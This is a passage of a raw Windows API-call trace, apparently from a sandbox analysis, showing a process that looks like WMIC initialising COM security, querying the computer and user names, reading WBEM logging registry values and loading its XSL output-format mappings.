HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0250.364] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0250.369] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0250.380] CoCreateInstance (in: rclsid=0xffe473a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffe47370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xffeb2940 | out: ppv=0xffeb2940*=0x1e91390) returned 0x0 [0250.392] GetCurrentProcess () returned 0xffffffffffffffff [0250.392] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x26f600 | out: TokenHandle=0x26f600*=0xf4) returned 1 [0250.392] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26f5f8 | out: TokenInformation=0x0, ReturnLength=0x26f5f8) returned 0 [0250.392] malloc (_Size=0x118) returned 0x616990 [0250.392] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x616990, TokenInformationLength=0x118, ReturnLength=0x26f5f8 | out: TokenInformation=0x616990, ReturnLength=0x26f5f8) returned 1 [0250.392] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x616990*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=1498702425, Attributes=0x50d), (Luid.LowPart=0x0, Luid.HighPart=6389632, Attributes=0x0), (Luid.LowPart=0x690057, Luid.HighPart=6553710, Attributes=0x77006f), (Luid.LowPart=0x790053, Luid.HighPart=7602291, Attributes=0x6d0065), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x6f0050, Luid.HighPart=6619255, Attributes=0x530072))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0250.392] free (_Block=0x616990) [0250.392] CloseHandle (hObject=0xf4) returned 1 [0250.392] malloc (_Size=0x40) returned 0x617f80 [0250.393] malloc (_Size=0x40) returned 0x616990 [0250.393] malloc (_Size=0x40) returned 0x6169e0 [0250.393] malloc (_Size=0x20a) returned 0x616a30 [0250.393] GetSystemDirectoryW (in: lpBuffer=0x616a30, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0250.393] free (_Block=0x616a30) [0250.393] malloc (_Size=0x18) returned 0x616a30 [0250.393] malloc (_Size=0x18) returned 0x616a50 [0250.393] malloc (_Size=0x18) returned 0x616a70 [0250.393] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0250.393] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0250.393] free (_Block=0x616a30) [0250.393] free (_Block=0x616a50) [0250.393] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0250.394] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0250.394] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0250.394] FreeLibrary (hLibModule=0x77940000) returned 1 [0250.394] free (_Block=0x616a70) [0250.394] _vsnwprintf (in: _Buffer=0x6169e0, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x26f228 | out: _Buffer="ms_409") returned 6 [0250.394] malloc (_Size=0x20) returned 0x616a30 [0250.394] GetComputerNameW (in: lpBuffer=0x616a30, nSize=0x26f600 | out: lpBuffer="XDUWTFONO", nSize=0x26f600) returned 1 [0250.395] lstrlenW (lpString="XDUWTFONO") returned 9 [0250.395] malloc (_Size=0x14) returned 0x616a60 [0250.395] lstrlenW (lpString="XDUWTFONO") returned 9 [0250.395] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x26f5f8 | out: lpNameBuffer=0x0, nSize=0x26f5f8) returned 0x7fffffde000 [0250.396] GetLastError () returned 0xea [0250.396] malloc (_Size=0x40) returned 0x616a80 [0250.396] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x616a80, nSize=0x26f5f8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26f5f8) returned 0x1 [0250.396] lstrlenW (lpString="") returned 0 [0250.396] lstrlenW (lpString="XDUWTFONO") returned 9 [0250.397] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0250.399] lstrlenW (lpString=".") returned 1 [0250.399] lstrlenW (lpString="XDUWTFONO") returned 9 [0250.399] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0250.399] lstrlenW (lpString="LOCALHOST") returned 9 [0250.399] lstrlenW (lpString="XDUWTFONO") returned 9 [0250.399] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0250.399] lstrlenW (lpString="XDUWTFONO") returned 9 [0250.399] lstrlenW (lpString="XDUWTFONO") returned 9 [0250.399] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0250.399] free (_Block=0x616a60) [0250.399] lstrlenW (lpString="XDUWTFONO") returned 9 [0250.399] malloc (_Size=0x14) returned 0x616a60 [0250.399] lstrlenW (lpString="XDUWTFONO") returned 9 [0250.399] lstrlenW (lpString="XDUWTFONO") returned 9 [0250.399] malloc (_Size=0x14) returned 0x616ad0 [0250.400] lstrlenW (lpString="XDUWTFONO") returned 9 [0250.400] malloc (_Size=0x8) returned 0x616af0 [0250.400] malloc (_Size=0x18) returned 0x616b10 [0250.400] malloc (_Size=0x30) returned 0x616b30 [0250.400] malloc (_Size=0x18) returned 0x616b70 [0250.400] SysStringLen (param_1="IDENTIFY") returned 0x8 [0250.400] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0250.400] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0250.400] SysStringLen (param_1="IDENTIFY") returned 0x8 [0250.400] malloc (_Size=0x30) returned 0x616b90 [0250.400] malloc (_Size=0x18) returned 0x616bd0 [0250.400] SysStringLen (param_1="IMPERSONATE") returned 0xb [0250.400] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0250.400] SysStringLen (param_1="IMPERSONATE") returned 0xb [0250.400] SysStringLen (param_1="IDENTIFY") returned 0x8 [0250.400] SysStringLen (param_1="IDENTIFY") returned 0x8 [0250.400] SysStringLen (param_1="IMPERSONATE") returned 0xb [0250.400] malloc (_Size=0x30) returned 0x616bf0 [0250.400] malloc (_Size=0x18) returned 0x616c30 [0250.400] SysStringLen (param_1="DELEGATE") returned 0x8 [0250.400] SysStringLen (param_1="IDENTIFY") returned 0x8 [0250.400] SysStringLen (param_1="DELEGATE") returned 0x8 [0250.401] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0250.401] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0250.401] SysStringLen (param_1="DELEGATE") returned 0x8 [0250.401] malloc (_Size=0x30) returned 0x616c50 [0250.401] malloc (_Size=0x18) returned 0x616c90 [0250.401] malloc (_Size=0x30) returned 0x616cb0 [0250.401] malloc (_Size=0x18) returned 0x616cf0 [0250.401] SysStringLen (param_1="NONE") returned 0x4 [0250.401] SysStringLen (param_1="DEFAULT") returned 0x7 [0250.401] SysStringLen (param_1="DEFAULT") returned 0x7 [0250.401] SysStringLen (param_1="NONE") returned 0x4 [0250.401] malloc (_Size=0x30) returned 0x616d10 [0250.401] malloc (_Size=0x18) returned 0x616d50 [0250.401] SysStringLen (param_1="CONNECT") returned 0x7 [0250.401] SysStringLen (param_1="DEFAULT") returned 0x7 [0250.401] malloc (_Size=0x30) returned 0x616d70 [0250.401] malloc (_Size=0x18) returned 0x616db0 [0250.401] SysStringLen (param_1="CALL") returned 0x4 [0250.401] SysStringLen (param_1="DEFAULT") returned 0x7 [0250.401] SysStringLen (param_1="CALL") returned 0x4 [0250.401] SysStringLen (param_1="CONNECT") returned 0x7 [0250.401] malloc (_Size=0x30) returned 0x616dd0 [0250.401] malloc (_Size=0x18) returned 0x616e10 [0250.401] SysStringLen (param_1="PKT") returned 0x3 [0250.401] SysStringLen (param_1="DEFAULT") returned 0x7 [0250.401] SysStringLen (param_1="PKT") returned 0x3 [0250.402] SysStringLen (param_1="NONE") returned 0x4 [0250.402] SysStringLen (param_1="NONE") returned 0x4 [0250.402] SysStringLen (param_1="PKT") returned 0x3 [0250.402] malloc (_Size=0x30) returned 0x616e30 [0250.402] malloc (_Size=0x18) returned 0x616e70 [0250.402] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0250.402] SysStringLen (param_1="DEFAULT") returned 0x7 [0250.402] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0250.402] SysStringLen (param_1="NONE") returned 0x4 [0250.402] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0250.402] SysStringLen (param_1="PKT") returned 0x3 [0250.402] SysStringLen (param_1="PKT") returned 0x3 [0250.402] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0250.402] malloc (_Size=0x30) returned 0x618000 [0250.403] malloc (_Size=0x18) returned 0x616e90 [0250.403] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0250.403] SysStringLen (param_1="DEFAULT") returned 0x7 [0250.403] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0250.403] SysStringLen (param_1="PKT") returned 0x3 [0250.403] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0250.403] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0250.403] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0250.403] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0250.403] malloc (_Size=0x30) returned 0x618040 [0250.403] malloc (_Size=0x40) returned 0x616eb0 [0250.403] malloc (_Size=0x20a) returned 0x616f00 [0250.403] GetSystemDirectoryW (in: lpBuffer=0x616f00, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0250.403] free (_Block=0x616f00) [0250.403] malloc (_Size=0x18) returned 0x616f00 [0250.403] malloc (_Size=0x18) returned 0x616f20 [0250.403] malloc (_Size=0x18) returned 0x616f40 [0250.403] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0250.403] SysStringLen (param_1="\\wbem\\") returned 0x6 [0250.404] free (_Block=0x616f00) [0250.404] free (_Block=0x616f20) [0250.404] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0250.404] free (_Block=0x616f40) [0250.404] malloc (_Size=0x18) returned 0x616f00 [0250.404] malloc (_Size=0x18) returned 0x616f20 [0250.404] malloc (_Size=0x18) returned 0x616f40 [0250.404] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0250.404] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0250.404] free (_Block=0x616f00) [0250.404] free (_Block=0x616f20) [0250.404] GetCurrentThreadId () returned 0xdc [0250.404] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x26ef00 | out: phkResult=0x26ef00*=0xf8) returned 0x0 [0250.405] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x26ef50, lpcbData=0x26eef0*=0x400 | out: lpType=0x0, lpData=0x26ef50*=0x30, lpcbData=0x26eef0*=0x4) returned 0x0 [0250.405] _wcsicmp (_String1="0", _String2="1") returned -1 [0250.405] _wcsicmp (_String1="0", _String2="2") returned -2 [0250.405] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x26eef0*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x26eef0*=0x42) returned 0x0 [0250.405] malloc (_Size=0x86) returned 0x616f60 [0250.405] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x616f60, lpcbData=0x26eef0*=0x42 | out: lpType=0x0, lpData=0x616f60*=0x25, lpcbData=0x26eef0*=0x42) returned 0x0 [0250.405] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0250.405] malloc (_Size=0x42) returned 0x616ff0 [0250.405] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0250.405] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x26ef50, lpcbData=0x26eef0*=0x400 | out: lpType=0x0, lpData=0x26ef50*=0x36, lpcbData=0x26eef0*=0xc) returned 0x0 [0250.405] _wtol (_String="65536") returned 65536 [0250.405] free (_Block=0x616f60) [0250.405] RegCloseKey (hKey=0x0) returned 0x6 [0250.405] CoCreateInstance (in: rclsid=0xffe47410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffe473f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x26f3f8 | out: ppv=0x26f3f8*=0x3271d0) returned 0x0 [0250.430] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x3271d0, xmlSource=0x26f540*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x616f00), isSuccessful=0x26f5b0 | out: isSuccessful=0x26f5b0*=0xffff) returned 0x0 [0250.591] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x3271d0, DOMElement=0x26f3f0 | out: DOMElement=0x26f3f0*=0x32bc50) returned 0x0 [0250.591] malloc (_Size=0x18) returned 0x61c560 [0250.592] IXMLDOMElement:getElementsByTagName (in: This=0x32bc50, tagName="XSLFORMAT", resultList=0x26f400 | out: resultList=0x26f400*=0x329cc0) returned 0x0 [0250.592] free (_Block=0x61c560) [0250.592] IXMLDOMNodeList:get_length (in: This=0x329cc0, listLength=0x26f5c8 | out: listLength=0x26f5c8*=21) returned 0x0 [0250.593] IXMLDOMNodeList:get_item (in: This=0x329cc0, index=0, listItem=0x26f3d0 | out: listItem=0x26f3d0*=0x32bd50) returned 0x0 [0250.593] IXMLDOMNode:get_text (in: This=0x32bd50, text=0x26f3e0 | out: text=0x26f3e0*="texttable.xsl") returned 0x0 [0250.593] IXMLDOMNode:get_attributes (in: This=0x32bd50, attributeMap=0x26f3d8 | out: attributeMap=0x26f3d8*=0x3278d0) returned 0x0 [0250.593] malloc (_Size=0x18) returned 0x61c560 [0250.593] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3278d0, name="KEYWORD", namedItem=0x26f3e8 | out: namedItem=0x26f3e8*=0x32a280) returned 0x0 [0250.594] free (_Block=0x61c560) [0250.594] IXMLDOMNode:get_nodeValue (in: This=0x32a280, value=0x26f420 | out: value=0x26f420*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x4)) returned 0x0 [0250.594] malloc (_Size=0x18) returned 0x61c560 [0250.594] malloc (_Size=0x18) returned 0x61c580 [0250.594] malloc (_Size=0x30) returned 0x618080 [0250.594] IUnknown:Release (This=0x32bd50) returned 0x0 [0250.594] IUnknown:Release (This=0x3278d0) returned 0x0 [0250.594] IUnknown:Release (This=0x32a280) returned 0x0 [0250.594] IXMLDOMNodeList:get_item (in: This=0x329cc0, index=1, listItem=0x26f3d0 | out: listItem=0x26f3d0*=0x32bd50) returned 0x0 [0250.594] IXMLDOMNode:get_text (in: This=0x32bd50, text=0x26f3e0 | out: text=0x26f3e0*="textvaluelist.xsl") returned 0x0 [0250.594] IXMLDOMNode:get_attributes (in: This=0x32bd50, attributeMap=0x26f3d8 | out: attributeMap=0x26f3d8*=0x3278d0) returned 0x0 [0250.594] malloc (_Size=0x18) returned 0x61c5a0 [0250.595] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3278d0, name="KEYWORD", namedItem=0x26f3e8 | out: namedItem=0x26f3e8*=0x32a280) returned 0x0 [0250.595] free (_Block=0x61c5a0) [0250.595] IXMLDOMNode:get_nodeValue (in: This=0x32a280, value=0x26f420 | out: value=0x26f420*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x4)) returned 0x0 [0250.595] malloc (_Size=0x18) returned 0x61c5a0 [0250.595] malloc (_Size=0x18) returned 0x61c5c0 [0250.595] SysStringLen (param_1="VALUE") returned 0x5 [0250.595] SysStringLen (param_1="TABLE") returned 0x5 [0250.595] SysStringLen (param_1="TABLE") returned 0x5 [0250.595] SysStringLen (param_1="VALUE") returned 0x5 [0250.595] malloc (_Size=0x30) returned 0x6180c0 [0250.595] IUnknown:Release (This=0x32bd50) returned 0x0 [0250.595] IUnknown:Release (This=0x3278d0) returned 0x0 [0250.595] IUnknown:Release (This=0x32a280) returned 0x0 [0250.595] IXMLDOMNodeList:get_item (in: This=0x329cc0, index=2, listItem=0x26f3d0 | out: listItem=0x26f3d0*=0x32bd50) returned 0x0 [0250.595] IXMLDOMNode:get_text (in: This=0x32bd50, text=0x26f3e0 | out: text=0x26f3e0*="textvaluelist.xsl") returned 0x0 [0250.595] IXMLDOMNode:get_attributes (in: This=0x32bd50, attributeMap=0x26f3d8 | out: attributeMap=0x26f3d8*=0x3278d0) returned 0x0 [0250.595] malloc (_Size=0x18) returned 0x61c5e0 [0250.596] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3278d0, name="KEYWORD", namedItem=0x26f3e8 | out: namedItem=0x26f3e8*=0x32a280) returned 0x0 [0250.596] free (_Block=0x61c5e0) [0250.596] IXMLDOMNode:get_nodeValue (in: This=0x32a280, value=0x26f420 | out: value=0x26f420*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x4)) returned 0x0 [0250.596] malloc (_Size=0x18) returned 0x61c5e0 [0250.596] malloc (_Size=0x18) returned 0x61c600 [0250.596] SysStringLen (param_1="LIST") returned 0x4 [0250.596] SysStringLen (param_1="TABLE") returned 0x5 [0250.596] malloc (_Size=0x30) returned 0x618100 [0250.596] IUnknown:Release (This=0x32bd50) returned 0x0 [0250.596] IUnknown:Release (This=0x3278d0) returned 0x0 [0250.596] IUnknown:Release (This=0x32a280) returned 0x0 [0250.596] IXMLDOMNodeList:get_item (in: This=0x329cc0, index=3, listItem=0x26f3d0 | out: listItem=0x26f3d0*=0x32bd50) returned 0x0 [0250.596] IXMLDOMNode:get_text (in: This=0x32bd50, text=0x26f3e0 | out: text=0x26f3e0*="rawxml.xsl") returned 0x0 [0250.596] IXMLDOMNode:get_attributes (in: This=0x32bd50, attributeMap=0x26f3d8 | out: attributeMap=0x26f3d8*=0x3278d0) returned 0x0 [0250.596] malloc (_Size=0x18) returned 0x61c620 [0250.597] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3278d0, name="KEYWORD", namedItem=0x26f3e8 | out: namedItem=0x26f3e8*=0x32a280) returned 0x0 [0250.597] free (_Block=0x61c620) [0250.597] IXMLDOMNode:get_nodeValue (in: This=0x32a280, value=0x26f420 | out: value=0x26f420*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x4)) returned 0x0 [0250.597] malloc (_Size=0x18) returned 0x61c620 [0250.597] malloc (_Size=0x18) returned 0x61c640 [0250.597] SysStringLen (param_1="RAWXML") returned 0x6 [0250.597] SysStringLen (param_1="TABLE") returned 0x5 [0250.597] SysStringLen (param_1="RAWXML") returned 0x6 [0250.597] SysStringLen (param_1="LIST") returned 0x4 [0250.597] SysStringLen (param_1="LIST") returned 0x4 [0250.597] SysStringLen (param_1="RAWXML") returned 0x6 [0250.597] malloc (_Size=0x30) returned 0x618140 [0250.597] IUnknown:Release (This=0x32bd50) returned 0x0 [0250.597] IUnknown:Release (This=0x3278d0) returned 0x0 [0250.597] IUnknown:Release (This=0x32a280) returned 0x0 [0250.597] IXMLDOMNodeList:get_item (in: This=0x329cc0, index=4, listItem=0x26f3d0 | out: listItem=0x26f3d0*=0x32bd50) returned 0x0 [0250.597] IXMLDOMNode:get_text (in: This=0x32bd50, text=0x26f3e0 | out: text=0x26f3e0*="htable.xsl") returned 0x0 [0250.597] IXMLDOMNode:get_attributes (in: This=0x32bd50, attributeMap=0x26f3d8 | out: attributeMap=0x26f3d8*=0x3278d0) returned 0x0 [0250.598] malloc (_Size=0x18) returned 0x61c660 [0250.598] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3278d0, name="KEYWORD", namedItem=0x26f3e8 | out: namedItem=0x26f3e8*=0x32a280) returned 0x0 [0250.598] free (_Block=0x61c660) [0250.598] IXMLDOMNode:get_nodeValue (in: This=0x32a280, value=0x26f420 | out: value=0x26f420*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x4)) returned 0x0 [0250.598] malloc (_Size=0x18) returned 0x61c660 [0250.598] malloc (_Size=0x18) returned 0x61c680 [0250.598] SysStringLen (param_1="HTABLE") returned 0x6 [0250.598] SysStringLen (param_1="TABLE") returned 0x5 [0250.598] SysStringLen (param_1="HTABLE") returned 0x6 [0250.598] SysStringLen (param_1="LIST") returned 0x4 [0250.598] malloc (_Size=0x30) returned 0x618180 [0250.598] IUnknown:Release (This=0x32bd50) returned 0x0 [0250.598] IUnknown:Release (This=0x3278d0) returned 0x0 [0250.598] IUnknown:Release (This=0x32a280) returned 0x0 [0250.598] IXMLDOMNodeList:get_item (in: This=0x329cc0, index=5, listItem=0x26f3d0 | out: listItem=0x26f3d0*=0x32bd50) returned 0x0 [0250.598] IXMLDOMNode:get_text (in: This=0x32bd50, text=0x26f3e0 | out: text=0x26f3e0*="hform.xsl") returned 0x0 [0250.598] IXMLDOMNode:get_attributes (in: This=0x32bd50, attributeMap=0x26f3d8 | out: attributeMap=0x26f3d8*=0x3278d0) returned 0x0 [0250.599] malloc (_Size=0x18) returned 0x61c6a0 [0250.599] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3278d0, name="KEYWORD", namedItem=0x26f3e8 | out: namedItem=0x26f3e8*=0x32a280) returned 0x0 [0250.599] free (_Block=0x61c6a0) [0250.599] IXMLDOMNode:get_nodeValue (in: This=0x32a280, value=0x26f420 | out: value=0x26f420*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x4)) returned 0x0 [0250.599] malloc (_Size=0x18) returned 0x61c6a0 [0250.599] malloc (_Size=0x18) returned 0x61c6c0 [0250.599] SysStringLen (param_1="HFORM") returned 0x5 [0250.599] SysStringLen (param_1="TABLE") returned 0x5 [0250.599] SysStringLen (param_1="HFORM") returned 0x5 [0250.599] SysStringLen (param_1="LIST") returned 0x4 [0250.599] SysStringLen (param_1="HFORM") returned 0x5 [0250.599] SysStringLen (param_1="HTABLE") returned 0x6 [0250.599] malloc (_Size=0x30) returned 0x6181c0 [0250.599] IUnknown:Release (This=0x32bd50) returned 0x0 [0250.599] IUnknown:Release (This=0x3278d0) returned 0x0 [0250.599] IUnknown:Release (This=0x32a280) returned 0x0 [0250.599] IXMLDOMNodeList:get_item (in: This=0x329cc0, index=6, listItem=0x26f3d0 | out: listItem=0x26f3d0*=0x32bd50) returned 0x0 [0250.600] IXMLDOMNode:get_text (in: This=0x32bd50, text=0x26f3e0 | out: text=0x26f3e0*="xml.xsl") returned 0x0 [0250.600] IXMLDOMNode:get_attributes (in: This=0x32bd50, attributeMap=0x26f3d8 | out: attributeMap=0x26f3d8*=0x3278d0) returned 0x0 [0250.600] malloc (_Size=0x18) returned 0x61c6e0 [0250.600] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3278d0, name="KEYWORD", namedItem=0x26f3e8 | out: namedItem=0x26f3e8*=0x32a280) returned 0x0 [0250.600] free (_Block=0x61c6e0) [0250.600] IXMLDOMNode:get_nodeValue (in: This=0x32a280, value=0x26f420 | out: value=0x26f420*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x4)) returned 0x0 [0250.600] malloc (_Size=0x18) returned 0x61c6e0 [0250.600] malloc (_Size=0x18) returned 0x61c700 [0250.600] SysStringLen (param_1="XML") returned 0x3 [0250.600] SysStringLen (param_1="TABLE") returned 0x5 [0250.600] SysStringLen (param_1="XML") returned 0x3 [0250.600] SysStringLen (param_1="VALUE") returned 0x5 [0250.600] SysStringLen (param_1="VALUE") returned 0x5 [0250.600] SysStringLen (param_1="XML") returned 0x3 [0250.600] malloc (_Size=0x30) returned 0x618200 [0250.600] IUnknown:Release (This=0x32bd50) returned 0x0 [0250.600] IUnknown:Release (This=0x3278d0) returned 0x0 [0250.601] IUnknown:Release (This=0x32a280) returned 0x0 [0250.601] IXMLDOMNodeList:get_item (in: This=0x329cc0, index=7, listItem=0x26f3d0 | out: listItem=0x26f3d0*=0x32bd50) returned 0x0 [0250.601] IXMLDOMNode:get_text (in: This=0x32bd50, text=0x26f3e0 | out: text=0x26f3e0*="mof.xsl") returned 0x0 [0250.601] IXMLDOMNode:get_attributes (in: This=0x32bd50, attributeMap=0x26f3d8 | out: attributeMap=0x26f3d8*=0x3278d0) returned 0x0 [0250.601] malloc (_Size=0x18) returned 0x61c720 [0250.601] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3278d0, name="KEYWORD", namedItem=0x26f3e8 | out: namedItem=0x26f3e8*=0x32a280) returned 0x0 [0250.601] free (_Block=0x61c720) [0250.601] IXMLDOMNode:get_nodeValue (in: This=0x32a280, value=0x26f420 | out: value=0x26f420*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x4)) returned 0x0 [0250.601] malloc (_Size=0x18) returned 0x61c720 [0250.601] malloc (_Size=0x18) returned 0x61c740 [0250.601] SysStringLen (param_1="MOF") returned 0x3 [0250.601] SysStringLen (param_1="TABLE") returned 0x5 [0250.601] SysStringLen (param_1="MOF") returned 0x3 [0250.601] SysStringLen (param_1="LIST") returned 0x4 [0250.601] SysStringLen (param_1="MOF") returned 0x3 [0250.601] SysStringLen (param_1="RAWXML") returned 0x6 [0250.601] SysStringLen (param_1="LIST") returned 0x4 [0250.602] SysStringLen (param_1="MOF") returned 0x3 [0250.602] malloc (_Size=0x30) returned 0x618240 [0250.602] IUnknown:Release (This=0x32bd50) returned 0x0 [0250.602] IUnknown:Release (This=0x3278d0) returned 0x0 [0250.602] IUnknown:Release (This=0x32a280) returned 0x0 [0250.602] IXMLDOMNodeList:get_item (in: This=0x329cc0, index=8, listItem=0x26f3d0 | out: listItem=0x26f3d0*=0x32bd50) returned 0x0 [0250.602] IXMLDOMNode:get_text (in: This=0x32bd50, text=0x26f3e0 | out: text=0x26f3e0*="csv.xsl") returned 0x0 [0250.602] IXMLDOMNode:get_attributes (in: This=0x32bd50, attributeMap=0x26f3d8 | out: attributeMap=0x26f3d8*=0x3278d0) returned 0x0 [0250.602] malloc (_Size=0x18) returned 0x61c760 [0250.602] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3278d0, name="KEYWORD", namedItem=0x26f3e8 | out: namedItem=0x26f3e8*=0x32a280) returned 0x0 [0250.602] free (_Block=0x61c760) [0250.602] IXMLDOMNode:get_nodeValue (in: This=0x32a280, value=0x26f420 | out: value=0x26f420*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x4)) returned 0x0 [0250.602] malloc 